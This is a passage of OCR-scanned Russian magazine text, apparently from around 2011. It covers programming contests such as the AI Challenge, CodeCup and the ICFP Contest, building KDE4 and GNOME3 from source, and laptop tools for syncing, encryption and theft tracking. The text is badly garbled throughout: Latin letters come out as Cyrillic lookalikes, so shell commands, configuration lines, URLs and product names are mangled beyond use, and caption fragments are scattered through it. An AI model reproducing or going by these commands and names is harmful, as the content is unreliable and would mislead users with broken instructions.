характеризуется двумя параметрами — количеством войск и их 
приростом за ход. Планеты могут быть как нейтральными, так и 
принадлежащими одному из двух соперников. Количество войск 
на нейтральных планетах не увеличивается. Еще есть корабли [на 
планетах или в полете), из которых формируется флот. Цель, как ты 
уже догадался, захватывать планеты и преобладать на карте. Бота 
для игры можно написать на большинстве популярных сегодня 
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ИНННИНАЯ 


сое ап 


Отличная реклама Сооде Соае }дапп 
2009 
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Турнир Р!апе Маг$, проходящий в рамках Сооде А! 
СКа!епдае 


языков — СЯ, Лама, Ру{Воп, С++, Зса[а, РНР, р, НазКкеЦц, ОСати(, 
СоНее5сптр{ и так далее. Для этого понадобится лишь соответ- 
ствующий «стартовый набор», скачать который можно с сайта про- 
екта. В игре уже приняло участие более 4600 ботов от людей из 112 
стран мира. Хотя первый бооце А! СПаЦепде уже состоялся, и на 
сайте вывешены его результаты, организаторы до сих пор не реши- 
ли, что же делать с призами, а точнее — будут ли таковые вообще. 
В официальном ГАС уклончиво значится: «Возможно. Мы над этим 
работаем». Однако деньги — это не всегда главное, принимать уча- 
стие в состязаниях такого рода можно и нужно просто «из любви к 
искусству» :]. 


СодеСир 


Когда: 

С сентября по январь 
Где: 

В онлайне 

Сайт: 

содесир.п( 


Данное соревнование очень похоже на описанный выше бооц(е А| 
СпаЦепде. Это снова онлайновые битвы ботов, только на этот раз 
основанные на игре Оуопп. Здесь, в отличие от бооще А| СВаЦепде, 
партии разыгрываются не 24/7 — показательные турниры проводят- 
ся каждые 3 недели. Стать участником можно, написав свою прогу и 
загрузив ее на содесир.п! в период с сентября по январь (конкрет- 
ные даты уточняй на сайте конкурса — прием заявок на СодеСир 
2011 уже закрыт, а на 2012 еще не объявлен). Участие совершенно 
бесплатно, достаточно лишь создать аккаунт на сайте соревнования. 
Прога компилируется и запускается под Шпих, а после компиляции 
обязательно проходит краш-тест. Если тест пройден нормально — ты 
в числе конкурсантов. Отправленное решение должно представ- 
лять собой один файл с исходным кодом размером не более 1.4 Мб. 
Писать можно на Разса(, С, С++, Уама, Руоп, НазКеЦ, ]ауазсгири 
(версии компиляторов и команды указаны на сайте). Контест, в 
общем-то, камерный, без могучих спонсоров и огромных призов, что 
отнюдь не делает его менее интересным. 
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Когда: 

Конец июня 
Где: 

В онлайне 
Сайт: 
'срсопе$.ога 


Конкурс с долгой и богатой историей. 1СЕР Сощез{ — это команд- 
ное ежегодное соревнование, которое проводится с 1998 года. 
Количество участников в команде неограниченно. Конкурс тра- 
диционно приурочивается к [СЕР [международная конференция 
по функциональному программированию) — каждый год за орга- 
низацию соревнования берется какой-либо крупный институт, и 
мероприятие всегда отличают необычные и интересные задачи. К 


примеру, в прошлые годы участникам уже приходилось сталкиваться 


с такими проблемами как необходимость приспособить пришельца 
вместе с его кораблем к жизни на Земле, управление спутниками 
на околоземной орбите с возвращением марсохода на базу и так 
далее. Задание дается всего одно, конкурс длится 72 часа [трое 
суток). Соревнование делится на два этапа: ЦаРптад гоипа [оцени- 
ваются решения, полученные в течение первых 24 часов) и тат 
гоипа (оцениваются все отосланные решения]. Решение может быть 
написано на любом языке (победители предыдущих лет писали на 
НазкеЦ, ОБесиуе Сагп(, С++, СЦК и Уауа], главное — чтобы не воз- 
никло проблем с его запуском на тестовой машине. Призы на 1СЕРС 
довольно скромные, так как эти деньги в первую очередь призваны 
помочь победителям посетить саму конференцию, на которой и про- 
ходит церемония награждения. 


АррИр Оеуеорег СпаЦепде от |{е| 
Когда: 

Прием заявок на новый этап стартовал 21 февраля 
де: 

В онлайне 

Сайт: 

зоЙ\миаге.п{е(. согп/ги-ги/агсе$Ладр-сваЦепае-3 


АррУр Оеуворег СваЦепде — международное соревнование раз- 
работчиков ПО, ориентированное на продвижение перспективных 
приложений, которые способны изменить впечатление пользовате- 
лей от работы с нетбуками и планшетными ПК на базе процессоров 
[пе Адют. В прошлом году в конкурсе участвовало 350 приложений 
из самых разных стран мира, и в числе победителей оказались и 
наши соотечественники: «приз зрительских симпатий» и премию 

в $60 тыс. получили российские разработчики из Самары Артем 
Шерстобитов, Илья Грачев и Николай Чолаков с игрой А(сПету 
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Победитель РасебооК НасКег Сир и живая легенда 
спортивного программирования — Петр Митричев 


Радостные победители Тор Содег Ореп 


Сас. Отличился и Дмитрий Рыжков, занявший второе место в 
номинации Ноте |ппоуайоп Рго]ес{ с игрой АК Ноте. Его премия 
составила $8 тыс. Правила конкурса, в целом, просты: нужно пред- 
ставить на суд жюри конкурса приложение, относящееся к одной из 
следующих категорий. «Лучшее коммуникационное приложение», 
«Лучшее медиаприложение», «Лучшее информационное приложе- 
ние», «Лучшее приложение для синхронизации», «Лучшее игровое 
приложение», «Лучшее специальное приложение для Франции». 
Кроме того, приложения участвуют в розыгрыше «гран-при» в 
четырех дополнительных номинациях: «Лучшее приложение для 
различных платформ», «Самое элегантное приложение Меебо», 
«Лучшее приложение для планшетника/нетбука» и «Премия самому 
ценному разработчику». Выиграть здесь можно не только деньги, но 
и безумные вещи, цитируем: «Полностью оплаченное путешествие 
в Антарктику, включая 700-мильную экскурсию на Южный полюс, 
или получи приз 50 тысяч долларов и останься в тепле родного 
дома» :]. Также разыгрываются: возможность посетить конференцию 
ТЕО, совершить пятидневное путешествие по России, включающее 
сверхзвуковой полет на военных реактивных самолетах, поездка на 
Согп!с-Соп и так далее. == 


› 083 


м М Сергей «дг!пдег» Яремчук (г! п9ег@+их.{т.чца) 


КРОЕМ 
ОДЕЖКУ 


иб 


Самостоятельная сборка и оптимизация КОЕД 
МОМЕЗ 


® КОЕи СМОМЕ развиваются просто сумасшедшими темпами, пред- 
лагая пользователю новый функционал, улучшенную стабильность 

и устранение ошибок. Но путь релиза в репозитории дистрибутивов, 
как правило, долог: мэйнтейнер собирает пакет, всесторонне тести- 
рует его, и только после одобрения он попадает в основной репози- 
торий. А попробовать новую версию хочется уже сейчас. 


Подготовка для сборки 


Не все исправления и нововведения доходят до нас очень быстро. 
Например, на моментнаписания этих строк была доступна версия КОЕ 
ЪС 4.6.2, авофициальном репозитории Убипи 10.10 значилась только 
4.5.1. Аналогичная ситуация и в репозиториях других дистрибутивов и 
операционок — ореп ОЕ 11.4, бепттоо Чпих, ЕгееВЪО, ОрепВ5$В ит.д. 
Есть, конечно, и другие причины для самостоятельной сборки. В пакете 
из репозитория могут быть активированы не все функции или возмож- 
ности, которые хотелось бы использовать в работе. Или обнаружена 


› О8Д 


ошибка, которая мешает нормально юзать программу или открывает 
брешь в системе. Еще вариант: сборка получилась тяжеловесной, в 

ней присутствуют ненужные приложения, и появилось желание ее чуть 
«подрезать», чтобы сэкономить системные ресурсы. В общем, причины 
укаждого свои. Поэтому сегодня рассмотрим, как самостоятельно со- 
брать свои версии КОЕ и СМОМЕ. Все операции будем производить на 
[/пих Мп Е 10 с рабочей средой СМОМЕ. В других дистрибутивах процесс 
практически полностью аналогичен. Для экспериментов рекомендую 
создать новую учетную запись, в которой и проводитьтестирование. 
Иначе при первом запуске могут быть внесены изменения в профиль, и 
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КОЕ в Оби 


Чтобы в УбБиг(и получить версию КПЕ, близкую к последней, следует 
подключить репозиторий киБипт{и-рра/баскро“е: 


$ эидо ааа-ар*-геро$1огу рра: КиБипи-рра/ 
Баскрогт$ 

$ зидо ар*-ве{ ирда*е 

$ эидо ар*-ве{ 1п5%а11 КиБипи-ае$Кор 


залогиниться со старой версией не удастся. Кстати, подобную рекомен- 
дацию могу дать и тем, кто юзает несколько дистров собщим /Погте. Еще 
один немаловажный момент — пользователь должен получать доступ 
кзидо. Для этого — включаем его в группу адгат [в Мпих Мп}. Далее 
настраиваем среду сборки. Разработчики приготовили рекомендации 

и скрипт -/.Би(а-сопйд, устанавливающий необходимые глобальные 
переменные [<ск.гу/ВУТа) и настройки для -/.БазВгс. Некоторые пара- 
метры внутри закомментированы, следует внимательно их просмотреть 
и определиться с их необходимостью. Например, при сборке в 64-бит- 
ной системе надо обязательно установить: 


ехрогЕ ЕТВ_ЗИЕЕТХ=64 


Чтобы не собирать Каезак, комментируем строку «а!а$ 
паке=такеоб]». Аналогично определяемся, нужна ли пересборка 
РУКОЕ4 и ОВОЦЪ. 

Обращаем внимание и на «Гипсйоп стакекае», в которой определены 
параметры сборки при помощи стаке. Так, по умолчанию компиляция 
производится с параметрами: 


стаке $КОЕ_ВУТИО 

\ -ОСМАКЕ_ТМ$ТАЕЕ_РКЕЕТХ=$КОЕОТВ 
\ -ОСМАКЕ_ВОТЕО_ТУРЕ=дефие+и11 

\ -ОКОЕ4_ВУТЕБ_ТЕ$ЗТ$=ТКИЕ 

п1се маке -/2 

таКе 1п${а11 


Числовой параметр после флага '-|' определяет количество по- 
токов и обычно выбирается по формуле [Х+1], гдеХх — число СРЦ. 
Если устанавливаются разные версии КОПЕ или варианты сборки, 
достаточно изменить путь $КОЕО!Р. Упростить весь процесс можно 
при помощи скриптов Кдезгс-БиЦа (Кдезгс-Б9.Ккае.ога] и би 9-00. 
Первый разрабатывается в рамках комьюнити КОЕ и более популя- 
рен. Предварительная настройка, в том числе выбор модулей для 
установки, производится при помощи конфигурационного файла 
-/.КЧезгс-БиЦагс. В архиве есть пример, копируем его и правим. 


$ ср -/Каезгс-Би11а-1.13/Каезгс-Би11агс-затр1е \ 
-/.Каезгс-Би11Тагс 


Параметров внутри предостаточно. Новичкам я бы посоветовал начать с 


изучения этого файла, это сниметвпоследствии много вопросов. Да, ине 
забудьустановить переменную: 


Кае-1апёчаде$ ги 
Модули настраиваются в конструкциях: 


поЧи]е <тоднч]1е-пате>» 
епа тоаи]1е 


Теперь запускаем: 
$ зидо ./Каезгс-Би11агс 
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Новая версия рабочего стола содержит значительные 
усовершенствования 


Скрипт самостоятельно скачает исходники, настроит среду, собе- 
рет, установит и протестирует результат. Поддерживается несколько 
дополнительных параметров, так, чтобы повторно не загружать 
файлы, добавляем '--по-5уп'. Для теста конфигурации используем 
'--ргеепа’, в этом случае будут проверены все установки без выпол- 
нения процедуры загрузки и сборки. И, наконец, '--гегезй-Бица' 
подчистит временные файлы, чтобы можно было начать процесс 
сборки повторно. Для работы Каезгс-Би{а понадобятся установлен- 
ные Рег | и ИБмллмм,. Надо сказать, потребуется много места на харде. 
Так, для сборки &{-сору, КдезиррогЕ, Кде6$, каеритИЬ$, КЧебазе 
нужно около 7 Гб, ноя бы выделил не менее 20 Гб на временные 
файлы и готовую среду. Дополнительные компоненты — этоеще 
плюс несколько гиг. 


Получаем исходники 


Чтобы более тонко настроить КПЕ, лучше провести ручную сборку без 
средств автоматизации. Все действия рекомендуется производить в 
подкаталоге -/Кде. В -/Кде/эгс закачиваем исходные тексты, а в -/Кде/ 
быЦа будет размещена готовая сборка. К слову, указанные ранее сбо- 
рочные скрипты устанавливаюталиасы с® и с6, упрощающие быстрый 
переход вуказанные каталоги. 

Если подключен репозиторий Кибипт{и-рра/басКрог($, то можно про- 
сто ввести: 


$ зидо ар*-ве{ 1п5%а11 ар{-Би11а 


В процессе позволяется выбрать оптимизацию под определенный 
тип процессора. 


$ зидо ар*-Би114 1п5%а11 Кибипжи-ае$Кор 


Сборка при этом будет проведена с параметрами, указанными в /е{с/ 
ар/ар{-Би(9.соп{. Такой подход, как правило, предоставляет нам мало 
возможностей по оптимизации, но зато пакеты впоследствии легко 
обновить. При помощи ар часто удобнее просто вытащить исходники 
и, главное, зависимости для сборки: 


$ зидо0 ар*-ве{ зоигсе Кибипи-ае$К®ор 
$ зидо ар*-вее Би11а-аер Кибипжи-ае$Кор 


Список пакетов, необходимых для корректной установки, очень 
большой. И кроме стандартных инструментов сборки, таких как БиЦа- 
еззепйа(, стаке, дохудеп, в нем присутствует множество заголовоч- 
ных файлов разных приложений и библиотек. Некоторые из зави- 
симостей необязательны, но впоследствии во время сборки может 
оказаться, что не активирован какой-то элемент. Например, если не 
установлен Ибхте-деу, КОЕ будет сконфигурирован без поддержки 
мультимедиа. Сам проект предлагает СИ репозитории (ашскан.Кае. 
ога] итарбалы (Ир.Кде.ого/ру6/Кае]. Доступен и $\/М, но его поддержка 
прекращается. Поэтому создаем файл: 
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каж 


рамные ри 


Частично оптимизировать приложение можно при 
помощи ар1-Бийа 


$ папо--/.9{соп_9 

[уг] "211: //апопё1{.Кае.огё/" ] 
1п5%еаа0+ = Кае: 

[уг] "51%@51{.Кае.огё:"] 
рчзИТп${еаа0+ = Кае: 


И закачиваем. Минимум, что потребуется, это: 


$ 21% с1опе Кае : Кае1165$ 
$ 214 с1опе Кае : Кае-могК5расе 
$ 21% с1опе Кае : Каер1т1165$ 


Если нужен больший функционал, то ставим Каети(итеса, 
КЧеаг\м/огК, е{гадеаги любые другие приложения и плагины. 
Также могут понадобиться исходники С. Здесь два варианта. 
КОЕ‘шный, с параметрами оптимизации, подобранными под КОЕ, 
багфиксами ит.п. 


$ 21% с1опе Кае :а*-Кае 


Или Скопоц$, предлагающий «чистый» Ц или патченный: 


// Ванильный 0% 
$ 21 с1опе 211: //21$ог1ои$.огё/а/а*. 51 
// С патчами 
$ 21 с1опе \ 
81%: //51$ог1ои$ .ог8/+Кае-аеуе1орег$ /а{/Кае-а{. 21+ 


Если ранее были сделаны изменения в -/.БазВгс и -/.БуЦ9-сопйд, о 
которых говорилось выше, переходим в каждый образованный под- 
каталоги последовательно даем команду: 


$ сидо стаКекае 


Здесь лучше написать простенький скрипт, который автоматизирует 
процесс: 


са $КОЕ_ВУТЕО 
ГОР ате ап 
К4е1 16$ 
Каер1т116$ 
ит.д. 


4о са $КОЕ_ВУТЕО/$а1г; стаКекае 2> /аеу/+аоиЕ; допе 


Сборка КОЕ производится при помощи сгпаке, команда ./сопЯдиге, к 
которой все привыкли, здесь не используется. Все дополнительные 
параметры задаются непосредственно в строке запуска стакКе или 
путем правки вспомогательных скриптов СМаКе$11${$ {и фай- 

лов срасширением *.стаке. Практически в каждом подкаталоге 
можно найти подобные настройки. Внутри описывается множество 
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При использовании стаКе вместо конфигурирования 
следует отредактировать конфиги 


параметров, причем значительная часть из них, ктому же, проком- 
ментирована. Разобравшись, можно легко подключить или отклю- 
чить сборку модуля или подкомпонента, расширив или, наоборот, 
урезав функционал. Например, функции а99_зибтгескогу( и ада _ 
орНопа!_зибаиес{огу() в СМаКез1${$.{х{ задают список загружаемых 
и используемых при сборке зависимостей. Потихоньку обходя все 
подкаталоги, определяем модули, которые следует включить или 
отключить. Конечно, многие функции затем можно деактивировать 
уже в рабочей системе, но если стоит вопрос уменьшения веса и 
нагрузки, то решение лучше принять сейчас. На слабых системах 
можно убрать поддержку семантического десктопа {пати пероппик, 
Каерит-приложения. Если видеокарта не тянет, то убираем под- 
держку эффектов в К\\п и ОрепбЕ полностью. На нетбуке удаление 
АКопаа! обеспечит прирост во времени загрузки чуть ли нена 20% 
плюс меньшее потребление ресурсов. Кроме того, можно убрать со- 
вместимость с КОЕЗ, сегодня в этом уже нет острой необходимости. 
Также можно убрать флаги га$ег и {гасе при сборке ({-ди!, это сразу 
облегчит, как минимум, на 30 Мб. 

На этом этапе преимущество получают гентушники: достаточно из- 
менить У$Е-флаг (деп{юо.ога/дуп/изе-шаех.хи? — и дело в шляпе, в 
других дистрах исходники придется рыть самому. К слову, последние 
стейджи в бептоо используют Х/-сжатие, в итоге — архивы с КОЕ4 
тянут на 200 Мб меньше [1,8 Гб против 2 Гб}. Крометого, можно пойти 
на более радикальные меры. Например, вместо Км/т использовать 


орепбох-подобный оконный менеджер. Сейчас находится в активной 
разработке Аписо, представляющий собой С{4/Х1 1 оконный менеджер 
+ рабочий стол [как КОЕ+К\/ п). Он не связан с Кде!$, а потому легкий 
и не нагружает систему. Главное, что он позволяет использовать мно- 
гие приложения из КОЕ. Минус — текущая версия 0.2 пока сыровата и 
содержит минимум функций. Загрузить АпЧсо можно из СК: 


$ 21 с1опе 21%: //=1ЕНиЬ. сот/ап1со/апЕ1со. 811 


Обеспечиваем загрузку 


Чтобы вместо СОМ использовать КОМ, просто прописываем «/и5г/ 
5п/кага» в /е{с/Х11/аеаи(-915р(ау-пападег. Теперь осталось 
занести в -/.хзе$зтоп или -/.хИгс строку «$аг(Кае» и зарегистри- 
роваться в системе. В дистрибутивах, базирующихся на Веап, 
общесистемными являются файлы в /ес/аЦегпай\е$. Среди 

них х-млп4о\м/-гппападегявляется симлинком на оконную среду, а 
х-5е55!оп-пападег — менеджером сеанса. Для выбора нужной сре- 
ды в окне регистрации можно создать файл /изг/зВаге/хзе!оп$/ 
Кае4.дезКор примерно такого содержания: 


$ зидо папо /изг/5Наге/хзе$юп$/К4е4.4е$Кор 
Ехес=$ФНОМЕ / Кае/61п/5+агЕКае 
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Раётиннни © 
фик  Првнеи | Гуин Трои" | зори 
|Вбыч и ЩИ —- Вы Уи 
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а Е Е ПЕ 
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41 Е Я О Ш 
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ИТ Е тЫ 
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Я и ГЯ ОЕ м м О а м МЕ 
ГНА ма ЕьЛ О &ОЬ вы ев са 
® 
Параметры УНВийа 


ТгуЕхес=$НОМЕ / Кае/61п/ Еаг+Кае 
Мате=КОоЕ4 


Сборка СМОМЕЗ 


К мажорным релизам сборщики дистрибутивов относятся насторожен- 
но, ведь первые версии, как правило, сыроваты, да и не содержат всех 
функций. Исправления и более полноценную среду СМОМЕ мы получим 
уже скоро вместе с обновлением 3.2. Чтобы пользователи могли сразу же 
познакомиться с новой версией, сразу после анонса было предложено 
два Име-дистрибутива: на базе ореп5Ц$Е и Еедога (дпогпе3З. ога гуй. 
Вл). Сейчастретий гном доступен во всех свежих релизах этой весны 
— орет 0$Е 11.4, Убигки 11.04 МаКу Магмра(и Еедога 15. 

Те, кто работают в ранних версиях системы или дистрибутивах, вроде 
[Ч/пих Мп, могут подключить РРА-репозиторий «СМОМЕ 3 Заск». 
Кроме собственно гнома, мы подключаем и С{К+ 3. 


$ зидо ааа-ар*-геро$1Жогу рра: ибипи-де$К%ор/впотез-Би114$ 
$ зидо ар*-ве{ ирда*е 
$ зидо ар*-ве{ 1п5%а11 гпотез-5е$$1оп 


Запускаем командой: 


$ гпоте - $Не11 --гер1асе 


Или просто выходим и регистрируемся повторно, выбрав С МОМЕЗ. Но 
хочу предупредить, что на момент написания этих строктам была са- 
мая первая сборка, ив Мпих Мипт она не работала должным образом. 
При помощи АРТ мы можем вытянуть и исходные тексты для само- 
стоятельной перекомпиляции. Сам проект предоставляет в открытый 
доступ С®-репозиторий [9(.дпопле.ога} и ЕТР-сервер с архивами (Но. 
дпогпе.ога/риб/СМОМЕ]. 

Для сборки среды СМОМЕ и приложений используется специальный 
скрипт на Ру{Воп — /НВица [деуорегдпогпе.огаДВБи 9). Забираем 
последнюю версию из СК и устанавливаем обычным образом [потре- 
буется пакет дпоте-согпгпоп]: 


$ 21 с1опе 21%: //514.епоме.огё/)НЬи11а 
$ са ]ИБи11а 

$ таке -+ Макея1е.р1а1п 

$ таке -+ МакКея1е.р1а1п 1п$%а11 


Для корректной работы /НВица требует, чтобы переменная РАТН со- 
держала подкаталог-/.[осаМЬ!т. 


$ есйо РАТН=$РАТН: ->/.1оса1/Б1п >> -/.Базйгс 
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Настройка параметров сборки производится в конфигурационном фай- 
ле-/./ВБиЦагс. В архиве есть готовый пример, который берем за основу. 


$ ср ехатр1е$ /затр1е.)ИБи11агс -/.)Ибит1агс 


Файл разделен на несколько секций, где описываются репозитории, 
устанавливаемые модули, каталог для установки, флаги оптимизации. 
Полный список модулей можно найти на специальной странице Цуе. 
дпогпе.ога//ВБуца/Модщесе{. Модули устанавливаются рекурсивно, 
то есть, если для работы одного из них потребуется другой, тот будет 
собран автоматически. В простейшем случае файл выглядиттак: 


$ папо -/.]ИБиКагс 

геро$[ '21%.5поме.ог8'] = '$$Й: //изег@51* .впоте.огё/1*/' 
тоЧч1езе* = 'впоте-зи1Фе$-соге-3.0' 

тоЧч1е$ = [ 'тефа-впоте-ае$К®ор'’ ] 

спескочгоо*{ = о5.рафИ.ехрапацзег( '--/спескои*/впоте') 
ргейях = '/ор{/впоте' 

# флаги СЕЕАб$ 

# 0$ .епу1гоп[' СРЕАб$5'] = '-Ма11 -& -00' 

# дополнительные аргументы вроде 

'--915а61е-5фа{1с --915а61е-2%К-дос' 

#аифорепагв$5='"' 

таКеаг5$ = '-)2"' 


После настройки набираем: 


$ ]пБи11а зап1успеск 


Программа создаст необходимые для работы каталоги и проверитна- 
личие утилит, используемых при сборке. Здесь есть нюанс: запускать 
ШПбчца отимени рута нельзя, поэтому все рабочие подкаталоги и 
прочие действия, требующие привилегий администратора, придется 
выполнять вручную, затем повторно вводить «]ПБиЦа заппусвВеск». 
Все зависимости описаны в документе Име.дпоге.ога//брицаОе- 
репдепс!ес и доступны в репозитории любого дистрибутива (мини- 
мум это: 114, Реп, Рувопи ССС). Я бы рекомендовал использовать 
именно его, впоследствии не будет проблем с обновлениями, и другие 
программы будут «видеть» установленные таким образом пакеты. 
Хотя предлагается альтернативный вариант — просто использовать 
параметр Бос{{гар: 


$ ]Нби114 Боо%$гар 


Если запКусВеск показал, что все нормально, можно переходить к 
следующему шагу: 


$ упбизта Би11а 


Теперь /НВиц@ загрузит, соберет и установит все описанные в 
-//ВБиЦагс модули. Оченьудобно, что в случае ошибки на любом этапе 
сборки скриптне заканчивает работу, а выводит меню, позволяющее 
выбрать дальнейшее действие (пропустить, повторить, сконфигури- 
ровать ит.п... 

С помощью /НВица можно собрать и отдельное приложение или 
библиотеку: 


$ уни 1а Би11а вЕК+ 


Заключение 


Как видишь, в самостоятельной сборке КОЕ4 и СМОМЕЗ нетничего 
сложного. Разработчики проектов позаботились о продвинутых (и не- 
терпеливых] пользователях, подготовив вспомогательные инструмен- 
ты. Конечно, некоторое время следует потратить на изучение настроек 
в конфигурационных файлах, но результат оправдаетожидания. == 
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м м Евгений Зобнин (ехесЬЖ.ги) 


ПРОКАЧАЙ 
СВОИ НОУТБУК 


«Ми$ Пауе»-софт для владельцев ноутбуков 


® С технической точки зрения ноутбуки и нетбуки мало чем 
отличаются от обычных стационарных компов, однако у лаптопов 
есть своя специфика использования, которая не пересекается с 
обычными ПК и поэтому требует особых настроек и приложении. 


Коротко о проблеме 


Почему ноутбук требуетустановки и настройки дополнительного ПО? 
Да просто потому, что он отличается от обычного компа: 

1. Ноутбуки и нетбуки принято использовать как замену стационарного 
компа в случае, когда последний оказывается недоступен или неудо- 
бен. Это значит, что ноутбук должен иметь какие-то средства синхро- 
низации файлов, чтобы ты всегда работал с актуальной информацией, 
не обременяя себя перекидыванием файлов вручную. 

2. Ноутбук — лакомый кусочек для воров, поэтому необходимо поза- 
ботиться о защите своих личных данных и установить ПО, которое 
поможет вернутьустройство на его законное место. 

3. Ноутбук — портативное устройство, с которым ты можешь придти на 
учебу, работу, к друзьям. Поэтому он должен иметь удобные средства 
обмена информацией слюбым другим устройством, будьто телефон, 
обычный комп или другой ноутбук. 

4. Ноутбук имеет ограниченные средства взаимодействия с пользова- 
телем: небольшой (и часто широкоформатный] экран, тачпад вместо 
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мыши, не всегда удобную клавиатуру с набором горячих клавиш, 
которые могут просто не работать. Нужны средства, позволяющие на- 
строить все эти «органы ввода-вывода» и сделать их как можно более 
удобными. 

5. Ноутбук оснащен батареей, которая иссякнет за полтора-два часа, 
если не предпринять каких-то особых мер. 

Есть еще множество различных нюансов, таких как «фирменные 
элементы управления», не работающие в Ч пих, наличие веб-камеры, 
встроенного модема и других устройств из коробки. Но они нетак важ- 
ны. Больше всего нас интересуют перечисленные выше пять пунктов, 
разбором которых мы и займемся. 


Синхронизация данных 


Еслиты используешь ноутбук в качестве своего основного инструмен- 
та и единственного ПК в доме, то проблема синхронизации данных 
тебя фактически не касается. Но если это лишь «походный» вариант, то 
вопрос актуализации данных на ноутбуке встает остро. 

Есть несколько способов держать файлы портативного устройства в 
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° -=дие8 оп --1ех1=“Отключиуть епс? $?” 


\ епсЁ5 -5 ФЕНС Ф0ЕС 


Простой скрипт, который позволяет не заботиться о монтировании епс® вручную 


актуальном состоянии. Самое простое — перекидывать 
файлы с основного компа каждый раз, когдаты отправля- 
ешься в путь. Просто, безлишних заморочек, но неудобно. 
Файлы можно синхронизироватьудаленно, используя 
инструменты типа гэупс, ср или даже ди, но такой подход 
опять же требует ручного вмешательства и, крометого, 
жреттрафик (а онуж больно дорогой для беспроводного 
интернета]. Гораздо проще и дешевле воспользоваться 
специальными инструментами, изначально разработанны- 
ми для синхронизации данных между машинами. Наиболее 
известный инструментна этом поприще носитимя Огорбох, 
за последние годы он стал настолько популярен, что я не 
верю, что ты еще не пользуешься его возможностями. Но 
даже если это нетак, установить его не составиттруда. 
Огорбох удобен и полностью автоматизирован, после 
запуска он сразу начинает синхронизацию, датак умело, 
что затраты на трафик оказываются минимальными (это 
происходит благодаря д9еЦа-синхронизации, во время ко- 
торой загружаются только изменившиеся части файла). Но 
у Огорбох есть пара очень досадных проблем. Во-первых, 
онхранит файлы на собственных серверах, что влечет 

за собой очевидные проблемы с конфиденциальностью 
(сами создатели Огорбох говорят, что архитектура их 
сервиса в принципе не позволяет им подсмотреть чужие 
данные, но полагаться на их заверенияя бы не стал], а 
во-вторых, он имеет ограничение на объем загруженных 
данных (2 Гб}, для снятия которого придется заплатить. 
Если тебя все это не устраивает, то предлагаю отличную 
альтернативу под названием Уп!зоп, который имеет 

почти все преимущества ОгорБох, оснащен двумя типами 
интерфейса [СТК и СЦ}, тонко настраивается, но самое 
главное — хранит файлы не «где попало», а натвоем 
собственном домашнем компе. 

Единственные его ограничения — это необходимость 
поднятия 55Н-сервера наудаленной [домашней] машине 
и белый [Р-адрес, по которому до машины можно будет 
достучаться. Если это условие выполнено, то дело за 
малым. Надо просто установить Уп!зоп на сервер: 


$ зи40 ар*-ве+ 1п5%а11 ип150п 
И спомощью такой же команды — на клиентскую машину 


(ноутбук). Далее на клиентской машине запускаем графи- 
ческий интерфейс: 


$ чп150п-вК2 
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Выбираем профиль (можно оставить детаи(), далее — 
локальный каталог. В следующем окне вводим путь до 
удаленного каталога, указываем метод подключения к 
серверу [55Н]}, адрес сервера и имя пользователя. 

После этого должно открыться главное окно программы, в 
котором будут показаны различия между каталогами. Для 
запуска процедуры синхронизации достаточно нажать бо. 
Чтобы Уп!5оп автоматически производил синхронизацию 
каталогов, его следует добавить в сгоп: 


$ еспо "*/18 + * * + /изг/61п/ипа оп -аиео -БаЕсИ" 


| сгопжаь - 


Защищаемся от воров 


Ноутбуки крадут, и крадут часто. Тоненький, компактный 
девайс, опрометчиво оставленный владельцем без присмо- 
тра, довольно просто утащить с собой. Найти вора обычно 
оказывается практически невозможно, ноутбук втотже день 
будетпродан по бросовой цене. И можешь даже не наде- 
яться нато, что новый владелец не просмотрит содержимое 
жесткого диска и не воспользуется паролями, сохранен- 
ными вбраузере. Избежать этого можно двумя путями: 


Настраиваем прокрутку с помощью д5упарйсз 


общие Нажатие Прокрутка дсомеганол | 


Прокрутка 
Включить вертикальную прокрутку 
медленние Г 7 быстрее 
Включить горизонтальную прокрутку 
Медлемние | 
Включить циклическую прокрутку 


Быстрее 


ВЕТ рр Бе ТРНСЫВ 


магн Том 5 1 


На краю 


продолжать прокрутку 
движение курсора 


о Спраока 3 Закрыть 


р шо 

® В АгсАИпих есть 
более развитая 
альтернатива меб {$ с 
возможностью загруз- 
ки файлов на сервер: 
$ уаочгЕ -$ ади1сК$егуе 
$ аи1сКзегуе \ 


/путь/до/каталога 


® Самый простой спо- 

соб выложить каталог 

в сеть: 

$ са /путь/до/каталога 

$ руЕПоп -т \ 
$1ир1енНтТР5егуег 


® Отключаем тачпад 
из командной строки: 
$ зупс11еп* 
Тоиспрадо++=1 
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А эффективен ли Ргеу? 


У Ргеу есть одна очень серьезная проблема: он требует сетевого 
подключения к интернету, а шансы на то, что вор [или купивший 
украденный ноут человек] настроит его, когда будет лазить по твоей 
системе, минимальны. Поэтому следует позаботиться о том, чтобы 
система автоматически подключалась к любым доступным каналам 
связи во время загрузки. С обычным ЕШФегпе все просто — любой 
[/пих и так по умолчанию настраивает все проводные сетевые 
интерфейсы с помощью ОНСР (если ты отключил эту возможность, 
верни все на место). А вот с \МЕ! сложнее: открытые беспроводные 
сети сегодня есть только в общественных местах, но вряд ли новый 
владелец будет «крутить» ноут там, в любом другом месте для входа 
в интернет потребуется ключ. Так что придется надеяться только на 
«плохие мозги» человека, который догадается подключиться к сети 
сам. 


защитить паролями все, что только можно, и зашифровать жесткий 
диск, либоустановить наустройство специальное ПО, которое поможет 
найти текущего пользователя ноутбука. Но еще лучше использовать 
комбинированный подход, при котором в ОС будетустановлен софт, 
позволяющий отыскать вора, доступ в систему останется полностью 
открытым, а всетвои важные данные будут помещены в специальный 
зашифрованный каталог или дисковый раздел. Такты убьешь сразу двух 
зайцев: позволишь любопытному воришке (или новому «владельцу»] 
спокойно войти в систему и исследоватьее (в результате чего успеет 
сработать механизм, который доложиттебе о новом владельце ноута] и 
в то же время защитишьличные данные. Как это сделать? Очень просто: 
тебе понадобятся: 

1] пакет епс!5, содержащий шифрующую файловую систему (те, кто 
знаком с ТгиеСгур{ или Чт -сгуре, могут использовать их}; 

2) и программа Ргеу, которая будет скидыватьтебе на мыло инфуотеку- 
щей сетевой конфигурации ноута, снимки сме-камеры ит.д. Сначала 
установим и настроим епс{®. Она есть влюбом дистрибутиве, так что 
просто воспользуемся пакетным менеджером: 


$ и40 ар*-ве* 1п5%а11 епс$ 


Далее необходимо создать каталог, который будет содержать все важ- 
ные данные в зашифрованном виде. Пусть это будет -/.сгурто: 


$ шка1г ^/ .сгур®о 


Также необходимо выбрать/создать точку монтирования файловой 
системы. Назовем ее -/Чесгурко: 


$ мКа1г -—/десгур*о 


Теперь подключаем к каталогам епсЕс: 


$ епс+$ -/ .сгурфо >/аесгур®о 


В ответна первый вопрос вводим «р». Далее указываем пароль на до- 
